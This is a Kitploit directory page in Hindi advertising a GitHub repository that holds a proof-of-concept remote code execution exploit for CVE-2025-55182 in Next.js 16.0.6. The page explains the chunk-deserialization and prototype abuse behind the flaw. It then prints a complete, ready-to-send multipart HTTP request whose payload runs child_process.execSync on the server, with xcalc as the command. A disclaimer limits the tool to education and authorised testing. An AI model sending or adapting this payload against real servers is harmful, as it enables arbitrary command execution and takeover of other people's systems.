Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182-RCE-Exploit — More exploit-focused; great for security research repos. | Kitploit
उपकरण/GitHubGitHub/orgito1015/cve-2025-55182-rce-exploit
Vulnerability AnalysisExploitationWeb Application ExploitationPapers & ResearchLearning & EducationPayload Development
GitHuborgito1015/cve-2025-55182-rce-exploit

CVE-2025-55182-RCE-Exploit

More exploit-focused; great for security research repos.

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
8 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-55182 के लिए POC – Next.js 16.0.6 रिमोट कोड निष्पादन

इस रिपॉजिटरी में CVE-2025-55182 के लिए एक कार्यशील प्रूफ-ऑफ-कॉन्सेप्ट (POC) शामिल है, जो Next.js 16.0.6 को प्रभावित करने वाली एक गंभीर डिसीरियलाइजेशन कमजोरी है। यह शोषण $@ चंक डिसीरियलाइजेशन और Chunk.prototype.then का दुरुपयोग करके चंक रिज़ॉल्यूशन प्रक्रिया पर पूर्ण नियंत्रण प्राप्त करता है और सर्वर पर मनमाना कोड निष्पादन (RCE) प्राप्त करता है।

कमजोरी का सारांश

Next.js सर्वर एक्शन के लिए आंतरिक Chunk ऑब्जेक्ट और स्ट्रीमिंग/डिसीरियलाइजेशन तंत्र का उपयोग करता है। $@ का दुरुपयोग करके Chunk संदर्भ को डिसीरियलाइज़ करके और रूट ऑब्जेक्ट में Chunk.prototype.then इंजेक्ट करके, एक हमलावर निम्नलिखित कर सकता है:

  • Next.js को हमलावर-नियंत्रित this के साथ then(...) कॉल करने के लिए मजबूर कर सकता है
  • चंक status को resolved_model पर सेट कर सकता है
  • हमलावर द्वारा पूरी तरह नियंत्रित नकली चंक के साथ initializeModelChunk ट्रिगर कर सकता है
  • खतरनाक आंतरिक व्यवहार तक पहुंचने के लिए chunk._response विधियों का दुरुपयोग कर सकता है

अंतिम लक्ष्य Blob डिसीरियलाइजेशन को ट्रिगर करना है, जो इस तरह का कॉल निष्पादित करता है:

root@kitploit:~
response._formData.get(response._prefix)

response._formData.get = Function सेट करके और response._prefix में मनमाना कोड डालकर, हमलावर मनमाना सिस्टम कमांड निष्पादित कर सकता है।

शोषण POC

poc/CVE-2025-55182.http में HTTP अनुरोध स्थानीय रूप से चल रहे Next.js 16.0.6 के विरुद्ध शोषण प्रदर्शित करता है, जो child_process.execSync के माध्यम से xcalc स्पॉन करता है:

root@kitploit:~
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('xcalc');","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

रिपॉजिटरी लेआउट

root@kitploit:~
/
├── README.md
├── DISCLAIMER.md
├── poc/
│   └── CVE-2025-55182.http
└── analysis/
    └── exploitation-notes.md

अस्वीकरण

यह प्रोजेक्ट केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। किसी भी सिस्टम पर इस शोषण का उपयोग न करें जिसके आप मालिक नहीं हैं या जिसके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति नहीं है।

लेखक किसी भी दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेता है।

टूल डाउनलोड करें